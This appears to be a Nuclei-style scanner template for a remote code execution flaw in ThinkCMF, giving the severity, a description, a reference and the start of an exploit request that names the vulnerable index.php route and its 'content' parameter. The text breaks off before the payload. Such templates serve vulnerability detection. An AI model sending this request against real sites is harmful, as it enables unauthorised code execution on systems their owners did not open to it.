id: thinkcmf-arbitrary-code-execution info: name: ThinkCMF - Remote Code Execution author: pikpikcu severity: high description: ThinkCMF is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://www.shuzhiduo.com/A/l1dygr36Je/ metadata: max-request: 1 tags: thinkcmf,rce http: - method: GET path: - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=